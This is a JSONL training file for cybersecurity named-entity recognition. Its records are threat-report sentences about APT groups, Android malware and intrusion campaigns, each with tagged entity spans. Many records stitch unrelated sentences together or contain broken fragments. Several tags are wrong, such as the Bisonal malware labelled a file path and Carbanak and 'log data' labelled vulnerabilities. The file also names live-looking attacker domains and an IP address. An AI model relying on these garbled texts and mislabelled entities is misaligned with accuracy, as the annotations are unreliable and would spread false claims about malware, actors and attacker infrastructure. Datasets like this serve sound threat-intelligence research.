{"text": "Both publications happened before the second wave took place and received notable publicity .", "spans": {}, "info": {"id": "cyberner_stix_train_004616", "source": "cyberner_stix_train"}}
{"text": "The Android permissions requested by HenBox , as defined in the apps ’ AndroidManifest.xml files , range from accessing location and network settings to messages , call , and contact data . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": {"SYSTEM: Android": [[4, 11]], "MALWARE: HenBox": [[37, 43]], "THREAT_ACTOR: APT41": [[215, 220]], "ORGANIZATION: video game developers": [[294, 315]], "MALWARE: backdoor tools": [[414, 428]], "THREAT_ACTOR: Sofacy group": [[449, 461]], "MALWARE: Zebrocy": [[475, 482]]}, "info": {"id": "cyberner_stix_train_004617", "source": "cyberner_stix_train"}}
{"text": "What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"FILEPATH: Bisonal": [[335, 342]], "TOOL: PDF": [[422, 425]]}, "info": {"id": "cyberner_stix_train_004618", "source": "cyberner_stix_train"}}
{"text": "These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection , as well as changes to the C2 communication mechanisms .", "spans": {"TOOL: API": [[61, 64]], "TOOL: C2": [[155, 157]]}, "info": {"id": "cyberner_stix_train_004619", "source": "cyberner_stix_train"}}
{"text": "Immediately when the File Manager window is opened by the attacker , the Quasar serve sends two commands to the RAT : GetDrives and listDirectory ( to populate the list of the victim ’s files in the RAT Server GUI ) .", "spans": {"TOOL: the File Manager window": [[17, 40]], "MALWARE: Quasar": [[73, 79]], "TOOL: RAT": [[112, 115]], "TOOL: RAT Server GUI": [[199, 213]]}, "info": {"id": "cyberner_stix_train_004620", "source": "cyberner_stix_train"}}
{"text": "The PinchDuke toolset consists of multiple loaders and a core information stealer Trojan .", "spans": {"MALWARE: PinchDuke": [[4, 13]], "TOOL: loaders": [[43, 50]], "TOOL: information stealer": [[62, 81]], "MALWARE: Trojan": [[82, 88]]}, "info": {"id": "cyberner_stix_train_004622", "source": "cyberner_stix_train"}}
{"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . This function takes several parameters, most of which are represented in the subdomain label(s) of the query . In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"MALWARE: XLoader 6.0": [[43, 54]], "ORGANIZATION: Twitter": [[188, 195]], "THREAT_ACTOR: APT12": [[272, 277]], "TOOL: HIGHTIDE": [[306, 314]], "TOOL: Microsoft Word": [[323, 337]], "TOOL: .doc": [[340, 344]], "VULNERABILITY: CVE-2012-0158": [[370, 383]]}, "info": {"id": "cyberner_stix_train_004623", "source": "cyberner_stix_train"}}
{"text": "Because the domain had been sinkholed , this activity could not be completed .", "spans": {}, "info": {"id": "cyberner_stix_train_004624", "source": "cyberner_stix_train"}}
{"text": "We can not say for sure if Wolf Research and Coralco Tech are linked , but this panel name , their offerings and the panel layout would suggest it should be considered suspiciously linked . which they launched targeted attacks against Russian banks , businesses and media companies . It makes use of a custom Base64 alphabet . A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": {"ORGANIZATION: Wolf Research": [[27, 40]], "ORGANIZATION: Coralco Tech": [[45, 57]], "ORGANIZATION: banks": [[243, 248]], "ORGANIZATION: businesses": [[251, 261]], "ORGANIZATION: media companies": [[266, 281]], "TOOL: browser": [[329, 336]]}, "info": {"id": "cyberner_stix_train_004625", "source": "cyberner_stix_train"}}
{"text": "TABLE OF CONTENTS Key Findings Introduction Threat Analysis Fakespy Code Analysis Dynamic Library Loading Stealing Sensitive Information Anti-Emulator Techniques Under Active Development Who is Behind Fakespy 's Smishing Campaigns ? \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": {"MALWARE: Fakespy": [[60, 67], [201, 208]], "ORGANIZATION: \bCTU": [[233, 237]], "THREAT_ACTOR: COBALT GYPSY": [[264, 276]], "ORGANIZATION: Symantec": [[388, 396]], "THREAT_ACTOR: Gallmaker": [[433, 442]]}, "info": {"id": "cyberner_stix_train_004626", "source": "cyberner_stix_train"}}
{"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: TG-3390": [[273, 280]]}, "info": {"id": "cyberner_stix_train_004627", "source": "cyberner_stix_train"}}
{"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . The use of BLACKCOFFEE demonstrates threat actors ’ evolving use of public websites to hide in plain sight . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": {"THREAT_ACTOR: Nitro": [[139, 144]], "ORGANIZATION: chemical sector": [[172, 187]], "MALWARE: BLACKCOFFEE": [[317, 328]]}, "info": {"id": "cyberner_stix_train_004628", "source": "cyberner_stix_train"}}
{"text": "Additionally , since it does not execute any other functionality autonomously , it would no longer be a direct threat .", "spans": {}, "info": {"id": "cyberner_stix_train_004629", "source": "cyberner_stix_train"}}
{"text": "In the future , it will be invoked by malicious SDK during banner ads display . Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd , which enabled the fraud to be committed . The group has been active since 2015 , but increased its attacks in 2019 . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": {"TOOL: Corkow": [[80, 86]], "ORGANIZATION: emails": [[320, 326]]}, "info": {"id": "cyberner_stix_train_004630", "source": "cyberner_stix_train"}}
{"text": "To assess attribution , CTU researchers analyze observed activity , third-party reporting , and contextual intelligence .", "spans": {"ORGANIZATION: CTU": [[24, 27]]}, "info": {"id": "cyberner_stix_train_004631", "source": "cyberner_stix_train"}}
{"text": "From an external analysts ’ point of view , the wonder is , which is superior to the other? And my answer for this is : neither is perfect , but both are useful – depending upon your goals and objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_004632", "source": "cyberner_stix_train"}}
{"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: Ploutus": [[55, 62]], "FILEPATH: MXI Player": [[220, 230]], "DOMAIN: com.mxi.videoplay": [[360, 377]]}, "info": {"id": "cyberner_stix_train_004633", "source": "cyberner_stix_train"}}
{"text": "Shellcode is passed to the exploit from HTML in flashvars .", "spans": {"TOOL: Shellcode": [[0, 9]], "TOOL: HTML": [[40, 44]]}, "info": {"id": "cyberner_stix_train_004634", "source": "cyberner_stix_train"}}
{"text": "However , many organizations fail to use these basic security measures , leaving their systems open to compromise :", "spans": {}, "info": {"id": "cyberner_stix_train_004635", "source": "cyberner_stix_train"}}
{"text": "The threat group's systemic long-term targeting of NGO and political networks does not align with patriotic or criminal threat groups .", "spans": {"ORGANIZATION: NGO": [[51, 54]]}, "info": {"id": "cyberner_stix_train_004636", "source": "cyberner_stix_train"}}
{"text": "] net , which was also used as a Poison Ivy C2 in the Arbor Networks blog . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"MALWARE: Poison Ivy": [[33, 43]], "ORGANIZATION: Arbor Networks": [[54, 68]], "THREAT_ACTOR: group's": [[120, 127]], "ORGANIZATION: video game industry": [[165, 184]], "THREAT_ACTOR: operators": [[363, 372]], "ORGANIZATION: FireEye": [[375, 382]], "THREAT_ACTOR: APT32": [[397, 402]]}, "info": {"id": "cyberner_stix_train_004637", "source": "cyberner_stix_train"}}
{"text": "Politically-motivated APT : Cybereason suspects that the objective of the threat actor is to obtain sensitive information from the victims and leverage it for political purposes .", "spans": {"ORGANIZATION: Cybereason": [[28, 38]]}, "info": {"id": "cyberner_stix_train_004638", "source": "cyberner_stix_train"}}
{"text": "Droppers Per Device Avg . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets . However , the MSI packages hosted at each URL are frequently changed or updated . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": {"TOOL: MSI": [[177, 180]], "SYSTEM: Exchange web server": [[358, 377]]}, "info": {"id": "cyberner_stix_train_004639", "source": "cyberner_stix_train"}}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "MALWARE: DoublePulsar backdoor": [[103, 124]], "MALWARE: SMB worm": [[151, 159]], "VULNERABILITY: Eternalblue": [[204, 215]], "TOOL: SMBv1": [[216, 221]], "VULNERABILITY: exploit": [[222, 229]]}, "info": {"id": "cyberner_stix_train_004640", "source": "cyberner_stix_train"}}
{"text": "One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina .", "spans": {"MALWARE: SPLM": [[12, 16]]}, "info": {"id": "cyberner_stix_train_004641", "source": "cyberner_stix_train"}}
{"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them . TinyZBot is a bot written in C# and developed by the Cleaver team . used in the microcode . While we can not validate these claims , there are indications that some of these documents are legitimate , which would demonstrate another significant increase in capability for the group .", "spans": {"TOOL: TinyZBot": [[133, 141]], "THREAT_ACTOR: Cleaver": [[186, 193]]}, "info": {"id": "cyberner_stix_train_004642", "source": "cyberner_stix_train"}}
{"text": "The remainder of this section describes at a high-level what HenBox is capable of , and how it operates . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: APT41": [[119, 124]], "ORGANIZATION: organizations": [[138, 151]], "ORGANIZATION: machine-learning": [[234, 250]], "ORGANIZATION: autonomous vehicles": [[253, 272]], "ORGANIZATION: medical imaging": [[275, 290]], "ORGANIZATION: consumer market": [[301, 316]], "ORGANIZATION: military": [[445, 453]], "ORGANIZATION: government personnel": [[458, 478]], "ORGANIZATION: defense": [[531, 538]], "ORGANIZATION: government": [[543, 553]], "ORGANIZATION: authors": [[573, 580]], "ORGANIZATION: journalists": [[585, 596]]}, "info": {"id": "cyberner_stix_train_004643", "source": "cyberner_stix_train"}}
{"text": "When executed the second time by clicking on the app on the physical device , FakeSpy redirects to the app settings . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": {"MALWARE: FakeSpy": [[78, 85]], "THREAT_ACTOR: activity cluster": [[123, 139]], "ORGANIZATION: Kaspersky": [[148, 157]], "ORGANIZATION: banks": [[236, 241]], "ORGANIZATION: money processing": [[274, 290]], "MALWARE: MyWeb sample": [[316, 328]], "ORGANIZATION: FireEye": [[334, 341]]}, "info": {"id": "cyberner_stix_train_004644", "source": "cyberner_stix_train"}}
{"text": "The author of Dumpert describes the tool as an LSASS dumping tool that uses direct system calls and API unhooking to evade antivirus and EDR solutions .", "spans": {"TOOL: Dumpert": [[14, 21]], "TOOL: LSASS": [[47, 52]], "TOOL: EDR": [[137, 140]]}, "info": {"id": "cyberner_stix_train_004645", "source": "cyberner_stix_train"}}
{"text": "This means that , unless victims lock their devices via the hardware button , the timer provides plenty of time for the malware to remotely perform malicious , in-app operations . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": {"ORGANIZATION: ZLAB": [[256, 260]], "THREAT_ACTOR: TA505": [[370, 375]], "TOOL: Bitcoin": [[451, 458]]}, "info": {"id": "cyberner_stix_train_004646", "source": "cyberner_stix_train"}}
{"text": "Note : DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors .", "spans": {"TOOL: DLL": [[7, 10]], "TOOL: backdoors": [[99, 108]]}, "info": {"id": "cyberner_stix_train_004647", "source": "cyberner_stix_train"}}
{"text": "The Russian government views the U.S. as a strategic rival and is known to task its intelligence agencies with gathering confidential information about individuals and organizations close to the center of power in the U.S. Individuals working for the Hillary for America campaign could have information about proposed policies for a Clinton presidency , including foreign-policy positions , which would be valuable to the Russian government .", "spans": {}, "info": {"id": "cyberner_stix_train_004648", "source": "cyberner_stix_train"}}
{"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe . Threat : Gamaredon Pteranodon weaponized document . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[346, 356]], "THREAT_ACTOR: NEODYMIUM": [[361, 370]], "ORGANIZATION: specific individuals": [[415, 435]], "THREAT_ACTOR: Gamaredon": [[457, 466]], "MALWARE: Pteranodon": [[467, 477]], "THREAT_ACTOR: threat actor": [[504, 516]], "THREAT_ACTOR: threat actors": [[673, 686]]}, "info": {"id": "cyberner_stix_train_004649", "source": "cyberner_stix_train"}}
{"text": "It is worth noting that this server also seems to be operated by CrookServers , since among other domains , 454-reverse.crookservers.net resolved to the same IP address .", "spans": {"ORGANIZATION: CrookServers": [[65, 77]], "DOMAIN: 454-reverse.crookservers.net": [[108, 136]]}, "info": {"id": "cyberner_stix_train_004650", "source": "cyberner_stix_train"}}
{"text": "The threat actors may be able to keep this session alive and maintain persistent access .", "spans": {}, "info": {"id": "cyberner_stix_train_004651", "source": "cyberner_stix_train"}}
{"text": "Since the class does not exist at startup , the application does not run on the debugger . Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit Tool ( HTRAN ) – to disguise their geographical locations . Download an archive with the tool ( .exe ) . 8.15 Logging & 8.16 Monitoring activities – determining the system information to log , store and query allows malicious behavior to be uncovered , if threat intelligence is applied to understand how threats may manifest themselves within log data .", "spans": {"THREAT_ACTOR: Moafee": [[91, 97]], "THREAT_ACTOR: DragonOK": [[102, 110]], "TOOL: HUC Packet Transmit Tool": [[146, 170]], "TOOL: HTRAN": [[173, 178]], "FILEPATH: .exe": [[262, 266]], "VULNERABILITY: log data": [[510, 518]]}, "info": {"id": "cyberner_stix_train_004652", "source": "cyberner_stix_train"}}
{"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": {"TOOL: Hermes": [[43, 49]], "TOOL: Ryuk": [[59, 63]], "MALWARE: beaconing": [[150, 159]], "MALWARE: command-and-control server": [[169, 195]]}, "info": {"id": "cyberner_stix_train_004653", "source": "cyberner_stix_train"}}
{"text": "The malware has been dubbed ‘ SimBad ’ due to the fact that a large portion of the infected applications are simulator games . Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . In 2015 , Suckfly conducted a multistage attack .", "spans": {"MALWARE: SimBad": [[30, 36]], "THREAT_ACTOR: APT39": [[167, 172]], "ORGANIZATION: telecommunications firms": [[325, 349]]}, "info": {"id": "cyberner_stix_train_004654", "source": "cyberner_stix_train"}}
{"text": "It first attracted our attention in April of this year when we observed an actor customizing the malware for use in highly targeted campaigns .", "spans": {}, "info": {"id": "cyberner_stix_train_004655", "source": "cyberner_stix_train"}}
{"text": "AutoFocus customers can track these tools with the Sofacy , SofacyMacro and SofacyCarberp .", "spans": {"ORGANIZATION: AutoFocus": [[0, 9]], "THREAT_ACTOR: Sofacy": [[51, 57]], "MALWARE: SofacyMacro": [[60, 71]], "MALWARE: SofacyCarberp": [[76, 89]]}, "info": {"id": "cyberner_stix_train_004656", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "MALWARE: decoy slideshows": [[203, 219]]}, "info": {"id": "cyberner_stix_train_004657", "source": "cyberner_stix_train"}}
{"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that ’ s able to reconstruct the real code executed by FinFisher . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region . Winnti : Dropper delivered by api.goallbandungtravel.com . Sandworm potentially developed the disruptive capability as early as three weeks prior to the OT event , suggesting the attacker may have been waiting for a specific moment to deploy the capability .", "spans": {"MALWARE: FinFisher": [[271, 280]], "TOOL: MPK bot": [[287, 294]], "THREAT_ACTOR: group": [[372, 377]], "THREAT_ACTOR: Rocket Kitten": [[387, 400]], "THREAT_ACTOR: Winnti": [[504, 510]], "DOMAIN: api.goallbandungtravel.com": [[534, 560]], "THREAT_ACTOR: Sandworm": [[563, 571]], "SYSTEM: OT": [[657, 659]]}, "info": {"id": "cyberner_stix_train_004658", "source": "cyberner_stix_train"}}
{"text": "The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"MALWARE: Monitor RAT": [[37, 48]], "MALWARE: LuminosityLink RAT": [[116, 134]], "MALWARE: NetWire RAT": [[137, 148]], "MALWARE: NjRAT": [[155, 160]], "FILEPATH: malicious file": [[219, 233]]}, "info": {"id": "cyberner_stix_train_004659", "source": "cyberner_stix_train"}}
{"text": "What makes this function more suspicious is the two strings written in Chinese characters : ===状态=== ( ===Status=== ) - Checks whether the device is connected to a network ===类型=== ( ===Type=== ) - Checks whether the device sees available nearby Wifi networks isNetworkAvailable function used for monitoring network connectivity status . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . All of the CnC communications are performed over the HTTP protocol .", "spans": {"THREAT_ACTOR: FIN7": [[342, 346]], "MALWARE: HTTP protocol": [[485, 498]]}, "info": {"id": "cyberner_stix_train_004660", "source": "cyberner_stix_train"}}
{"text": "After the installation , an application named “ Conference ” appears on the desktop : If the victim launches this app , he will see text which “ enlightens ” the information about the upcoming event : The full text reads follows . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[231, 240]], "VULNERABILITY: CVE-2016-4117": [[266, 279]], "THREAT_ACTOR: PROMETHIUM": [[298, 308]]}, "info": {"id": "cyberner_stix_train_004661", "source": "cyberner_stix_train"}}
{"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: Mofang": [[175, 181]]}, "info": {"id": "cyberner_stix_train_004662", "source": "cyberner_stix_train"}}
{"text": "Both WERDLOD and OSX_DOK.C are designed to kill the browser process before installing fake certificates .", "spans": {"MALWARE: WERDLOD": [[5, 12]], "MALWARE: OSX_DOK.C": [[17, 26]]}, "info": {"id": "cyberner_stix_train_004663", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke . Additional Analysis of the downloaded string is provided in the Gandcrab cradle section below . The “ -do ” flag specifies a SCIL program file to execute ( Figure 8) .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: MiniDuke": [[98, 106]], "TOOL: CosmicDuke": [[109, 119]], "TOOL: OnionDuke": [[122, 131]], "TOOL: CozyDuke": [[134, 142]], "TOOL: CloudDuke": [[145, 154]], "TOOL: SeaDuke": [[157, 164]], "TOOL: HammerDuke": [[167, 177]], "TOOL: PinchDuke": [[180, 189]], "TOOL: GeminiDuke": [[196, 206]], "MALWARE: Gandcrab": [[273, 281]]}, "info": {"id": "cyberner_stix_train_004664", "source": "cyberner_stix_train"}}
{"text": "The plugins are stored in its resource section and can be protected by the same VM . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns . Resource P1/1 contains config values , including port number and a registry path . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"TOOL: DDNS and actor-registered domains": [[126, 159]], "SYSTEM: C&C domains": [[293, 304]], "THREAT_ACTOR: Winnti": [[323, 329]]}, "info": {"id": "cyberner_stix_train_004665", "source": "cyberner_stix_train"}}
{"text": "Our sample communicates with app.progsupdate.com , which resolved to 185.141.25.68 , over TCP port 4664 .", "spans": {"DOMAIN: app.progsupdate.com": [[29, 48]], "IP_ADDRESS: 185.141.25.68": [[69, 82]]}, "info": {"id": "cyberner_stix_train_004666", "source": "cyberner_stix_train"}}
{"text": "Certificate information The Android package is named \" verReznov.Coampany . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": {"SYSTEM: Android": [[28, 35]], "MALWARE: tool": [[80, 84]], "THREAT_ACTOR: APT37": [[221, 226]], "ORGANIZATION: chemicals": [[382, 391]], "ORGANIZATION: electronics": [[394, 405]], "ORGANIZATION: manufacturing": [[408, 421]], "ORGANIZATION: aerospace": [[424, 433]], "ORGANIZATION: automotive": [[436, 446]], "ORGANIZATION: healthcare entities": [[451, 470]]}, "info": {"id": "cyberner_stix_train_004667", "source": "cyberner_stix_train"}}
{"text": "] 172 cdncool [ . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"THREAT_ACTOR: APT41": [[38, 43]], "TOOL: POISONPLUG": [[54, 64]], "TOOL: HIGHNOON": [[105, 113]], "THREAT_ACTOR: Dukes": [[157, 162]], "MALWARE: CosmicDuke": [[192, 202]]}, "info": {"id": "cyberner_stix_train_004668", "source": "cyberner_stix_train"}}
{"text": "Containment provided by enclaving also makes incident cleanup significantly less costly .", "spans": {}, "info": {"id": "cyberner_stix_train_004669", "source": "cyberner_stix_train"}}
{"text": "It has the added benefit of installing a nearly unlimited number of fraudulent apps without overloading the infected device . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground . In the sample analyzed , PIEHOP ’s entry point c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) calls PIEHOP ’s main function , supplying the argument .", "spans": {"ORGANIZATION: Novetta": [[152, 159]], "ORGANIZATION: International Civil Aviation Organization": [[291, 332]], "THREAT_ACTOR: Elfin": [[455, 460]]}, "info": {"id": "cyberner_stix_train_004670", "source": "cyberner_stix_train"}}
{"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "MALWARE: Backdoor.APT.Pgift": [[54, 72]], "VULNERABILITY: CVE-2017-8759": [[198, 211]]}, "info": {"id": "cyberner_stix_train_004671", "source": "cyberner_stix_train"}}
{"text": "Also in 2014 , APT32 carried out an intrusion against a Western country’s national legislature . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"THREAT_ACTOR: APT32": [[15, 20]], "ORGANIZATION: Group-IB": [[97, 105]], "TOOL: email": [[138, 143]], "ORGANIZATION: bank": [[160, 164]], "ORGANIZATION: employees": [[165, 174]], "TOOL: emails": [[210, 216]]}, "info": {"id": "cyberner_stix_train_004672", "source": "cyberner_stix_train"}}
{"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2 TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments . While previous routines took advantage of competing miners ’ activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files . After Kaspersky ’s reports of these attacks , the rest of 2013 saw reduced intensity of the campaign .", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]], "THREAT_ACTOR: TG-3390": [[413, 420]], "ORGANIZATION: Kaspersky ’s": [[1048, 1060]]}, "info": {"id": "cyberner_stix_train_004673", "source": "cyberner_stix_train"}}
{"text": "Using other individuals names for C2 communication has also been done by the two other Gaza Cybergang groups :", "spans": {"TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_004674", "source": "cyberner_stix_train"}}
{"text": "In some attacks , Whitefly has used a second piece of custom malware , Trojan.Nibatad . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"TOOL: Trojan.Nibatad": [[71, 85]], "VULNERABILITY: zero-day": [[193, 201]], "VULNERABILITY: exploit": [[202, 209]], "THREAT_ACTOR: Gamma Group": [[335, 346]]}, "info": {"id": "cyberner_stix_train_004675", "source": "cyberner_stix_train"}}
{"text": "Both toolsets were originally spotted being deployed by CozyDuke to its victims .", "spans": {"MALWARE: CozyDuke": [[56, 64]]}, "info": {"id": "cyberner_stix_train_004677", "source": "cyberner_stix_train"}}
{"text": "Targeting Postal and Transportation Services Companies One of the most significant findings is that new versions of FakeSpy target not only Korean and Japanese speakers , but also almost any postal service company around the world . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": {"MALWARE: FakeSpy": [[116, 123]], "THREAT_ACTOR: APT33": [[319, 324]], "THREAT_ACTOR: GCMAN group": [[585, 596]], "MALWARE: Putty": [[651, 656]], "MALWARE: VNC": [[659, 662]], "MALWARE: Meterpreter": [[669, 680]]}, "info": {"id": "cyberner_stix_train_004678", "source": "cyberner_stix_train"}}
